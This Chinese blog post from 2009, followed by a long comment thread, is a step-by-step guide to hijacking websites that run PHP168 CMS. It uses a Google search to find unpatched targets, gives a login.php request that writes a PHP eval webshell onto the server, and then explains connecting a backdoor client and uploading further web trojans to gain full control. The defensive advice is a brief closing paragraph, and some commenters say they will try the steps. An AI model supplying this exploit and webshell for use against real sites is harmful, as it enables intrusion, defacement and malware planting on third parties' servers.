利用登陆文件注入漏洞给网页挂马

| 阅读量 | 分类: SEO推广 | 作者: 卢松松 | 时间：2009年11月02日 09:30

本文操作方法十分简单，按照操作提示一步步来就可以完成了。不少网站在后台登陆框输入‘or’'='代码就可以直接登陆网站后台，这种方式曾经是最流行入侵方式，而今天卢松松讲的是如何利用login后台登陆文件漏洞注入代码。

login.php（.asp/.aspx）文件一般都是作为CMS系统的管理员后台登陆文件，这里以PHP168CMS系统为例，login.php漏洞实际上的一个注入漏洞，是利用文件代码设计不良直接讲恶意代码直接上传到网站目录中。利用此漏洞可以进入网站，实行内容篡、网页挂马等手段。

第一步,寻找使用PHP168CMS的网站

在google中输入“powered by php168”，然后随意找到一个网站作为测试，主要是寻找没有打补丁的网站。然后在域名后面输入，例：https://lusongsong.com/login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=<?php%20@eval($_POST[cmd]);?>如果出现了登陆界面就表明漏洞被成功利用。（文中的入侵域名请换成搜索的网站域名）

第二步,读取网站目录，获取网站绝对路径

如果代码成功执行，木马就会保存在cache\shell.php文件中，然后下载一个“lanker微型PHP后门客户端”，在木马地址栏输入https://lusongsong.com/cache/shell.php，然后选择读取目录，如果连接成功就能显示出网站所在服务器中的绝对路径。

第三步,开始上传PHP网页木马

在lanker微型PHP后门的基本功能列表中选择上传网页木马，上传的文件会保存在cache目录中。在域名的后面输入“cache/网站木马文件名”就可以运行木马了，至此已经对使用PHP168CMS系统的网站获得了控制权，可以任意的修改和删除。

其实存在login注入漏洞的不止PHP168一家，还有很多不知名的PHP网站源码都有这个漏洞,如果你使用的是PHP系统，请赶快检测你的程序是否有这个问题吧。对于PHP语言不了解的站长可以利用PHP注入漏洞扫描工具对你的网站进行扫描，例如：CASI、PHP-Mysql注入分析器、ZBSI等工具。更详细方法可以google一下：“如何预防和检测网页挂马”。或者查看我写过的关于网站挂马文章。

顶: 0 踩: 1

来源：卢松松博客 QQ/微信：13340454 ，转载请注明出处！

本文地址：https://lusongsong.com/reed/118.html

发表感想加入微信群

热门跟帖

最新跟帖

1楼卢松松

是呢 asp太流行了

跟帖来自电脑端时间:2010-03-23 13:47:19

顶: 0 踩: 0 回复

2楼卢松松

你的博文点不开了点就出现404错误

跟帖来自电脑端时间:2009-11-13 13:54:47

顶: 0 踩: 0 回复

3楼卢松松

到这里用email注册个头像，评论时用这个email就可以了
gravatar

跟帖来自电脑端时间:2009-11-08 20:00:50

顶: 0 踩: 0 回复

4楼卢松松

应该主要是预防吧

跟帖来自电脑端时间:2009-11-07 18:15:28

顶: 0 踩: 0 回复

5楼卢松松

下次别这样了，记得把数据库，和图片、附件文件夹一定要保留啊

跟帖来自电脑端时间:2009-11-04 21:41:24

顶: 0 踩: 0 回复

6楼南斗星

南儿国你在这里很能发表评论啊，呵呵。。。

跟帖来自电脑端时间:2009-11-11 16:00:39

顶: 0 踩: 0 回复

7楼超

这算是直接传shell的大漏洞了,不知几年cms界又如何

跟帖来自电脑端时间:2010-08-08 23:45:11

顶: 0 踩: 0 回复

8楼超

传说中的金庸二世,小生拜见

跟帖来自电脑端时间:2010-08-08 23:44:10

顶: 0 踩: 0 回复

9楼 52tool

我坦白我没有看懂是啥意思

跟帖来自电脑端时间:2009-11-04 21:05:41

顶: 0 踩: 0 回复

10楼虾

……我的理解是
PHP168站长因为追女吃醋，所以击掌约定，谁的网站在闹钟滴答到0点之前先挂掉，谁就自动退出这场感情竞争。
于是两人静坐电脑前，摆上一杯清茶，略微沉思，双方都不由得选择了登录漏洞注入挂马，毕竟两位PHP168站长的祖上曾念到过，卢松松博客上有一手利器可破PHP168。于是两人在感恩祖上，感恩卢松松之后，同时开始敲击键盘，移动鼠标。一霎那间，程序代码支离破碎，漫天飞舞，软件程序疲于应对，应声倒下。后来一个说相声的提前当年这场恶战，都后怕得牙痒痒，“知道吗？那是相当残忍，毒辣”
当PHP168站长双方目光与网络同时发力时，那个红颜薄命的女生则在一旁静静观战，暗自祈祷。。她身后的亲友团尖叫声弥漫。为了这个震撼的一幕。。。。。妇女界从此没有安宁。。。

跟帖来自电脑端时间:2009-11-04 14:06:12

顶: 0 踩: 0 回复

11楼拓荒.NET

为什么我没看懂？

跟帖来自电脑端时间:2009-11-04 13:50:06

顶: 0 踩: 0 回复

12楼卢松松

看了三遍才看懂最后一句你说的啥意思

跟帖来自电脑端时间:2009-11-04 11:54:06

顶: 0 踩: 0 回复

13楼网络生活

呵呵，看到了

跟帖来自电脑端时间:2009-11-04 11:00:06

顶: 0 踩: 0 回复

14楼卢松松

lusongsong/reed/79html

跟帖来自电脑端时间:2009-11-04 10:53:05

顶: 0 踩: 0 回复

15楼松亮

学会了侵入才能防止侵入

跟帖来自电脑端时间:2009-11-04 09:15:08

顶: 0 踩: 0 回复

16楼卢松松

没有研究只是想到了呵呵

跟帖来自电脑端时间:2009-11-04 09:04:23

顶: 0 踩: 0 回复

17楼唏嘘一世

打错个字，呵呵。应该是看方法

跟帖来自电脑端时间:2009-11-03 22:22:19

顶: 0 踩: 0 回复

18楼卢松松

一个过于关注流量的博客会做的好辛苦。此话说的正是我，

跟帖来自电脑端时间:2009-11-03 21:41:23

顶: 0 踩: 0 回复

19楼卢松松

我的博客是asp的呵呵

跟帖来自电脑端时间:2009-11-03 21:02:15

顶: 0 踩: 0 回复

20楼卢松松

写几篇娱乐性的文章，估计用不了多久就倒闭啦

跟帖来自电脑端时间:2009-11-03 21:04:45

顶: 0 踩: 0 回复

21楼卢松松

你的网站或者说是服务器很有价值。

跟帖来自电脑端时间:2009-11-03 21:09:45

顶: 0 踩: 0 回复

22楼卢松松

WP没有。这个只是设计不良造成的

跟帖来自电脑端时间:2009-11-03 21:14:50

顶: 0 踩: 0 回复

23楼卢松松

那也只是相对而言啊

跟帖来自电脑端时间:2009-11-03 21:19:14

顶: 0 踩: 0 回复

24楼卢松松

没转型，就算转型也不会转行黑客方面哈

跟帖来自电脑端时间:2009-11-03 21:22:12

顶: 0 踩: 0 回复

25楼卢松松

重点在防御啊

跟帖来自电脑端时间:2009-11-03 21:38:56

顶: 0 踩: 0 回复

26楼卢松松

找没有打补丁的才行

跟帖来自电脑端时间:2009-11-03 21:51:08

顶: 0 踩: 0 回复

27楼卢松松

此文的发布就是为了提醒站长及时更新补丁，而且文章最后已经提供的有预防和检测木马的方法

跟帖来自电脑端时间:2009-11-03 21:52:30

顶: 0 踩: 0 回复

28楼卢松松

我去找你玩

跟帖来自电脑端时间:2009-11-03 09:41:12

顶: 0 踩: 0 回复

29楼卢松松

WP没有

跟帖来自电脑端时间:2009-11-03 09:21:08

顶: 0 踩: 0 回复

30楼卢松松

你的安全系数很强

跟帖来自电脑端时间:2009-11-03 09:22:13

顶: 0 踩: 0 回复

31楼卢松松

我不是Hacker

跟帖来自电脑端时间:2009-11-03 09:25:06

顶: 0 踩: 0 回复

32楼菲萨塔

你太猛了这回复太多了

跟帖来自电脑端时间:2009-11-03 14:11:12

顶: 0 踩: 0 回复

33楼松亮

松亮每天访问一次。松亮都习惯

跟帖来自电脑端时间:2009-11-03 12:50:56

顶: 0 踩: 0 回复

34楼松亮

真是有瘾回这么多！！！目的何在

跟帖来自电脑端时间:2009-11-03 12:22:51

顶: 0 踩: 0 回复

35楼卢松松

那么说你对ASP很有研究了？

跟帖来自电脑端时间:2009-11-03 09:36:56

顶: 0 踩: 0 回复

36楼卢松松

我很少搞这方面的研究哦，主要是做网站防护用的

跟帖来自电脑端时间:2009-11-03 09:37:57

顶: 0 踩: 0 回复

37楼卢松松

php168漏洞已经填补了

跟帖来自电脑端时间:2009-11-02 21:24:02

顶: 0 踩: 0 回复

38楼卢松松

因为什么你觉得这文章不好呢？

跟帖来自电脑端时间:2009-11-02 21:39:47

顶: 0 踩: 0 回复

39楼卢松松

名字打错了，呵呵。我不研究黑客只是预防而已

跟帖来自电脑端时间:2009-11-02 21:40:15

顶: 0 踩: 0 回复

40楼卢松松

略懂，主要是为了防止自己网站入侵学了一点

跟帖来自电脑端时间:2009-11-02 21:43:47

顶: 0 踩: 0 回复

41楼卢松松

你的博客和所有博客都不同，自己开发的牛

跟帖来自电脑端时间:2009-11-02 21:45:03

顶: 0 踩: 0 回复

42楼卢松松

名字打错了，不是研究只是学习，以防后患

跟帖来自电脑端时间:2009-11-02 21:45:59

顶: 0 踩: 0 回复

43楼卢松松

你喜欢什么呢？

跟帖来自电脑端时间:2009-11-02 21:46:22

顶: 0 踩: 0 回复

44楼卢松松

莫非我又中奖了？

跟帖来自电脑端时间:2009-11-02 21:54:07

顶: 0 踩: 0 回复

45楼卢松松

wp没有我试过了

跟帖来自电脑端时间:2009-11-02 21:56:38

顶: 0 踩: 0 回复

46楼卢松松

犀利在那里？

跟帖来自电脑端时间:2009-11-02 21:57:11

顶: 0 踩: 0 回复

47楼卢松松

大师所言极是

跟帖来自电脑端时间:2009-11-02 21:58:21

顶: 0 踩: 0 回复

48楼卢松松

你肯定去试了

跟帖来自电脑端时间:2009-11-02 21:59:37

顶: 0 踩: 1 回复

49楼卢松松

仔细看文章写的有

跟帖来自电脑端时间:2009-11-02 22:00:40

顶: 0 踩: 0 回复

50楼卢松松

wp没有问题

跟帖来自电脑端时间:2009-11-02 22:01:40

顶: 0 踩: 0 回复

51楼卢松松

不是好这口，是学习用的

跟帖来自电脑端时间:2009-11-02 22:02:54

顶: 0 踩: 0 回复

52楼卢松松

只是略懂一二

跟帖来自电脑端时间:2009-11-02 22:35:16

顶: 0 踩: 0 回复

53楼卢松松

重点是在提醒，但要吸引人还是这么写

跟帖来自电脑端时间:2009-11-02 22:36:34

顶: 0 踩: 0 回复

54楼卢松松

防范应该在文章后面

跟帖来自电脑端时间:2009-11-02 22:36:58

顶: 0 踩: 0 回复

55楼卢松松

主要是讲原理，和如何防范吧

跟帖来自电脑端时间:2009-11-02 22:38:24

顶: 0 踩: 0 回复

56楼卢松松

小叶你认为我应该如何改进呢？

跟帖来自电脑端时间:2009-11-02 22:40:07

顶: 0 踩: 0 回复

57楼小叶

来松松这儿，看这篇文章的确很有这种感觉

跟帖来自电脑端时间:2009-11-02 10:40:48

顶: 0 踩: 0 回复

58楼一米

就是，我用的WordPress应该不会被松松黑吧，哈哈。

跟帖来自电脑端时间:2009-11-02 10:28:50

顶: 0 踩: 0 回复

59楼卢松松

在文章结尾处有吧

跟帖来自电脑端时间:2009-11-02 22:41:06

顶: 0 踩: 0 回复

60楼 yoja

已经添补丁了

跟帖来自电脑端时间:2009-11-02 16:02:40

顶: 0 踩: 0 回复

61楼卢松松

闲暇时间都在研究，做网站不能不懂点技术嘛

跟帖来自电脑端时间:2009-11-02 22:44:45

顶: 0 踩: 0 回复

62楼城市匆匆

跟帖来自电脑端时间:2009-11-02 09:34:20

顶: 0 踩: 0 回复

63楼浅笑无声

没事也盖盖楼。

跟帖来自电脑端时间:2009-11-03 20:53:50

顶: 0 踩: 0 回复

64楼亦歌

我不挤沙发，挤板凳。

跟帖来自电脑端时间:2009-11-02 17:16:47

顶: 0 踩: 0 回复

65楼 use56420

你不介意吧，俺想在这里蹭个小山头。谢谢啦。

跟帖来自电脑端时间:2009-11-11 17:04:47

顶: 0 踩: 0 回复

66楼 90后的贼

快来抓小偷啊[F]Grimace[/F]

跟帖来自电脑端时间:2009-11-03 15:14:25

顶: 0 踩: 0 回复

67楼 90后的贼

怎么没看到城管呢

跟帖来自电脑端时间:2009-11-03 15:14:06

顶: 0 踩: 0 回复

68楼 FORECE

怎么着也得蹭一蹭沙发啊！

跟帖来自电脑端时间:2009-11-03 12:56:51

顶: 0 踩: 0 回复

69楼 yoja

about2很多次沙发了吧，究竟何方神圣。莫非和老卢一个地方上班

跟帖来自电脑端时间:2009-11-02 15:33:45

顶: 0 踩: 0 回复

70楼 90后的贼

我也来撑个数，大家不会介意吧[F]Love[/F]

跟帖来自电脑端时间:2009-11-02 15:09:54

顶: 0 踩: 0 回复

71楼太阳博客

你不介意吧，俺想在这里蹭个小山头。谢谢啦。

跟帖来自电脑端时间:2009-11-02 13:06:27

顶: 0 踩: 0 回复

72楼

豆诺博客

这些都是技术性比较强的，我不怎么看得懂。

评论来自电脑端时间:2011-11-29 18:51:58

顶: 0 踩: 0 回复

73楼

天玉有双

松哥，这个也行！

评论来自电脑端时间:2011-06-01 13:13:24

顶: 0 踩: 0 回复

74楼

烟台SEO

把人教坏了

评论来自电脑端时间:2011-05-11 19:44:43

顶: 0 踩: 0 回复

75楼

亿思网站安全检测

利用漏洞做坏事！！！呵呵！

评论来自电脑端时间:2011-03-22 15:35:07

顶: 0 踩: 0 回复

76楼

博客之家

看来应该注意一下啊

评论来自电脑端时间:2010-11-21 06:56:47

顶: 0 踩: 0 回复

77楼

Baider

这个太邪恶了。

评论来自电脑端时间:2010-10-18 20:19:42

顶: 0 踩: 0 回复

78楼

ELChe

人满满的~~~！

评论来自电脑端时间:2010-08-17 20:08:51

顶: 0 踩: 0 回复

79楼

whatout

此文好邪恶

评论来自电脑端时间:2010-08-16 07:57:41

顶: 0 踩: 0 回复

80楼

clouder

这篇文章很垃圾，应该是php远程执行漏洞，提交的市php一句话木马。

评论来自电脑端时间:2010-08-04 09:41:44

顶: 0 踩: 0 回复

81楼

乐泰胶水

网络太可怕了

评论来自电脑端时间:2010-08-01 13:31:30

顶: 0 踩: 0 回复

82楼

關鍵字

厲害喔！我都沒有試過呢！

评论来自电脑端时间:2010-03-22 14:53:30

顶: 0 踩: 0 回复

83楼

沉睡海洋

卢松松还兼职黑客教程编写啊

评论来自电脑端时间:2010-03-21 18:14:55

顶: 0 踩: 0 回复

84楼

SEO

博主，厲害啦！我也按照步驟來試試先！

评论来自电脑端时间:2010-02-23 16:35:46

顶: 0 踩: 0 回复

85楼

奋斗Blog

ASP的更容易挂马

评论来自电脑端时间:2009-12-25 16:29:57

顶: 0 踩: 0 回复

85楼卢松松

是呢 asp太流行了

跟帖来自电脑端时间:2010-03-23 13:47:19

顶: 0 踩: 0 回复

86楼

安逸哇

楼可真高啊,看得我头都酸了~~~

评论来自电脑端时间:2009-12-02 18:16:19

顶: 0 踩: 0 回复

87楼

风云春秋

攻防结合懂得攻才知道怎么防！

评论来自电脑端时间:2009-11-12 22:54:55

顶: 0 踩: 0 回复

88楼

漢文溪

看了惊出一身冷汗

评论来自电脑端时间:2009-11-12 22:38:11

顶: 0 踩: 0 回复

88楼卢松松

你的博文点不开了点就出现404错误

跟帖来自电脑端时间:2009-11-13 13:54:47

顶: 0 踩: 0 回复

89楼

Xuu

[F]Love[/F][F]Faint[/F][F]Haha[/F] [F]Haha[/F][F]Haha[/F]
我是恶人，学习了，以后可以考虑用来挂点小广告。不过估计会很费时间，到我有能力做的时候还不如直接花钱买广告。

评论来自电脑端时间:2009-11-12 16:13:52

顶: 0 踩: 0 回复

90楼

Xuu

我的网站根本没流量，只加了个PHP的简单留言本，就被人加了一大堆垃圾留言。

评论来自电脑端时间:2009-11-12 16:03:05

顶: 0 踩: 0 回复

91楼

use56420

5555[F]Love[/F]

评论来自电脑端时间:2009-11-11 17:04:22

顶: 0 踩: 0 回复

92楼

use56420

555555[F]Love[/F]

评论来自电脑端时间:2009-11-11 17:03:52

顶: 0 踩: 0 回复

93楼

就做垃圾站

继续

评论来自电脑端时间:2009-11-10 20:14:26

顶: 0 踩: 0 回复

94楼

壹小时

以后要注意这个问题了，网站有点流量就有人搞

评论来自电脑端时间:2009-11-09 15:42:15

顶: 0 踩: 0 回复

95楼

男儿国

怎么更改评论的头像啊？

评论来自电脑端时间:2009-11-08 19:18:13

顶: 0 踩: 0 回复

95楼卢松松

到这里用email注册个头像，评论时用这个email就可以了
gravatar

跟帖来自电脑端时间:2009-11-08 20:00:50

顶: 0 踩: 0 回复

96楼

夜之无休

很好很强大啊！学习了，呵呵！

评论来自电脑端时间:2009-11-08 11:42:09

顶: 0 踩: 0 回复

97楼

阿东

好危险。。收录了。。
松哥哪个版本的PHP168。。。

评论来自电脑端时间:2009-11-08 10:53:38

顶: 0 踩: 0 回复

98楼

蓝莓绿茶

得小心了，即使做备份比较好~

评论来自电脑端时间:2009-11-07 22:26:48

顶: 0 踩: 0 回复

99楼

会律博客

效果明显大家都喜欢做坏事情哈哈！

评论来自电脑端时间:2009-11-06 20:15:21

顶: 0 踩: 0 回复

100楼

aisinvon

松松会教坏大家么

评论来自电脑端时间:2009-11-06 18:52:20

顶: 0 踩: 0 回复

100楼卢松松

应该主要是预防吧

跟帖来自电脑端时间:2009-11-07 18:15:28

顶: 0 踩: 0 回复

‹‹ 1 2 3 › ››

卢松松博客

利用登陆文件注入漏洞给网页挂马

| 阅读量 | 分类: SEO推广 | 作者: 卢松松 | 时间：2009年11月02日 09:30

发表感想加入微信群

豆诺博客

天玉有双

烟台SEO

亿思网站安全检测

博客之家

Baider

ELChe

whatout

clouder

乐泰胶水

關鍵字

沉睡海洋

SEO

奋斗Blog

安逸哇

风云春秋

漢文溪

Xuu

Xuu

use56420

use56420

就做垃圾站

壹小时

男儿国

夜之无休

阿东

蓝莓绿茶

会律博客

aisinvon

相关文章阅读更多：网站安全 站长

作者介绍

卢松松博客

利用登陆文件注入漏洞给网页挂马

| var nbcacheviewtemp=Math.floor(Math.random()*9999);$("#nbcache118").attr("id","nbcache118"+nbcacheviewtemp);Nobird_Cache_AddViewNums(30512,118,nbcacheviewtemp) 阅读量 | 分类: SEO推广 | 作者: 卢松松 | 时间：2009年11月02日 09:30

发表感想加入微信群

document.write('<a href="https://console.songsongyun.com/login/?back_url='+encodeURI(window.location.href)+'" target="_blank"><i class="fa fa-sign-in"></i> 点此登录松松云平台免费<i class="fa fa-address-card-o"></i>认证</a>');

豆诺博客

天玉有双

烟台SEO

亿思网站安全检测

博客之家

Baider

ELChe

whatout

clouder

乐泰胶水

關鍵字

沉睡海洋

SEO

奋斗Blog

安逸哇

风云春秋

漢文溪

Xuu

Xuu

use56420

use56420

就做垃圾站

壹小时

男儿国

夜之无休

阿东

蓝莓绿茶

会律博客

aisinvon

相关文章阅读更多：网站安全 站长

作者介绍

| 阅读量 | 分类: SEO推广 | 作者: 卢松松 | 时间：2009年11月02日 09:30

相关文章阅读更多：网站安全站长